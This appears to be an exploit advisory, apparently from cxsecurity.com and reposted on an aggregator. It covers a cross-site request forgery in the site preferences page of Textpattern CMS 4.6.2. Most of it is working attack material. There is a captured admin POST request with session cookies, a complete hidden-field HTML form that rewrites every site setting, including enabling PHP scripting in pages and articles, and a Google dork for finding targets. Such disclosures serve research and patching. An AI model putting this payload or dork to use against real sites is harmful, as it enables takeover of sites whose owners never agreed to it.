Textpattern CMS 4.6.2 Cross-site Request Forgery
2020-10-20 03:23:15 Author: cxsecurity.com(查看原文) 阅读量:106 收藏

# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery # Exploit Author: Alperen Ergel # Contact: @alpren_ae # Software Homepage: https://textpattern.com/ # Version : 4.6.2 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 2020-10-29 ######## Description ######## # # 1-) Loggin administrator page # # 2-) Go admin > prefs > site # # 3-) All inputs vulnerable to CSRF # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/textpattern/textpattern/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 1806 Connection: close Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40 Upgrade-Insecure-Requests: 1 Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0& is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7& use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles& file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=& smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4& title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1& use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1& include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0& comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1& comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=& custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=& step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720 ### EXPLOIT #### <html> <!-- CSRF PoC --> <body> <form action="https://localhost/textpattern/textpattern/index.php" method="POST"> <input type="hidden" name="Submit" value="Save" /> <input type="hidden" name="sitename" value="CHANGEHERE" /> <input type="hidden" name="siteurl" value="CHANGEHERE" /> <input type="hidden" name="site&#95;slogan" value="CHANGEHERE" /> <input type="hidden" name="production&#95;status" value="testing" /> <input type="hidden" name="timezone&#95;key" value="Europe&#47;Berlin" /> <input type="hidden" name="auto&#95;dst" value="0" /> <input type="hidden" name="is&#95;dst" value="0" /> <input type="hidden" name="dateformat" value="since" /> <input type="hidden" name="archive&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="permlink&#95;mode" value="section&#95;id&#95;title" /> <input type="hidden" name="doctype" value="html5" /> <input type="hidden" name="logging" value="none" /> <input type="hidden" name="expire&#95;logs&#95;after" value="7" /> <input type="hidden" name="use&#95;comments" value="1" /> <input type="hidden" name="img&#95;dir" value="images" /> <input type="hidden" name="skin&#95;dir" value="themes" /> <input type="hidden" name="file&#95;base&#95;path" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;files" /> <input type="hidden" name="file&#95;max&#95;upload&#95;size" value="2000000" /> <input type="hidden" name="tempdir" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;textpattern&#47;tmp" /> <input type="hidden" name="plugin&#95;cache&#95;dir" value="" /> <input type="hidden" name="smtp&#95;from" value="" /> <input type="hidden" name="publisher&#95;email" value="" /> <input type="hidden" name="override&#95;emailcharset" value="0" /> <input type="hidden" name="enable&#95;xmlrpc&#95;server" value="0" /> <input type="hidden" name="default&#95;event" value="article" /> <input type="hidden" name="theme&#95;name" value="hive" /> <input type="hidden" name="module&#95;pophelp" value="1" /> <input type="hidden" name="default&#95;publish&#95;status" value="4" /> <input type="hidden" name="title&#95;no&#95;widow" value="0" /> <input type="hidden" name="articles&#95;use&#95;excerpts" value="1" /> <input type="hidden" name="allow&#95;form&#95;override" value="1" /> <input type="hidden" name="attach&#95;titles&#95;to&#95;permalinks" value="1" /> <input type="hidden" name="permlink&#95;format" value="1" /> <input type="hidden" name="send&#95;lastmod" value="1" /> <input type="hidden" name="publish&#95;expired&#95;articles" value="0" /> <input type="hidden" name="use&#95;textile" value="1" /> <input type="hidden" name="enable&#95;short&#95;tags" value="1" /> <input type="hidden" name="use&#95;plugins" value="1" /> <input type="hidden" name="admin&#95;side&#95;plugins" value="1" /> <input type="hidden" name="allow&#95;page&#95;php&#95;scripting" value="1" /> <input type="hidden" name="allow&#95;article&#95;php&#95;scripting" value="1" /> <input type="hidden" name="max&#95;url&#95;len" value="1000" /> <input type="hidden" name="syndicate&#95;body&#95;or&#95;excerpt" value="1" /> <input type="hidden" name="rss&#95;how&#95;many" value="5" /> <input type="hidden" name="show&#95;comment&#95;count&#95;in&#95;feed" value="1" /> <input type="hidden" name="include&#95;email&#95;atom" value="0" /> <input type="hidden" name="use&#95;mail&#95;on&#95;feeds&#95;id" value="0" /> <input type="hidden" name="comments&#95;on&#95;default" value="0" /> <input type="hidden" name="comments&#95;default&#95;invite" value="Comment" /> <input type="hidden" name="comments&#95;moderate" value="1" /> <input type="hidden" name="comments&#95;disabled&#95;after" value="42" /> <input type="hidden" name="comments&#95;auto&#95;append" value="0" /> <input type="hidden" name="comments&#95;mode" value="0" /> <input type="hidden" name="comments&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="comments&#95;sendmail" value="0" /> <input type="hidden" name="comments&#95;are&#95;ol" value="1" /> <input type="hidden" name="comment&#95;means&#95;site&#95;updated" value="1" /> <input type="hidden" name="comments&#95;require&#95;name" value="1" /> <input type="hidden" name="comments&#95;require&#95;email" value="1" /> <input type="hidden" name="never&#95;display&#95;email" value="1" /> <input type="hidden" name="comment&#95;nofollow" value="1" /> <input type="hidden" name="comments&#95;disallow&#95;images" value="0" /> <input type="hidden" name="comments&#95;use&#95;fat&#95;textile" value="0" /> <input type="hidden" name="spam&#95;blacklists" value="" /> <input type="hidden" name="custom&#95;1&#95;set" value="custom1" /> <input type="hidden" name="custom&#95;2&#95;set" value="custom2" /> <input type="hidden" name="custom&#95;3&#95;set" value="" /> <input type="hidden" name="custom&#95;4&#95;set" value="" /> <input type="hidden" name="custom&#95;5&#95;set" value="" /> <input type="hidden" name="custom&#95;6&#95;set" value="" /> <input type="hidden" name="custom&#95;7&#95;set" value="" /> <input type="hidden" name="custom&#95;8&#95;set" value="" /> <input type="hidden" name="custom&#95;9&#95;set" value="" /> <input type="hidden" name="custom&#95;10&#95;set" value="" /> <input type="hidden" name="step" value="prefs&#95;save" /> <input type="hidden" name="event" value="prefs" /> <input type="hidden" name="&#95;txp&#95;token" value="0342db47efb6882b488f6d367067d720" /> <input type="submit" value="Do Action" /> </form> </body> </html>



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100117
如有侵权请联系:admin#unsafe.sh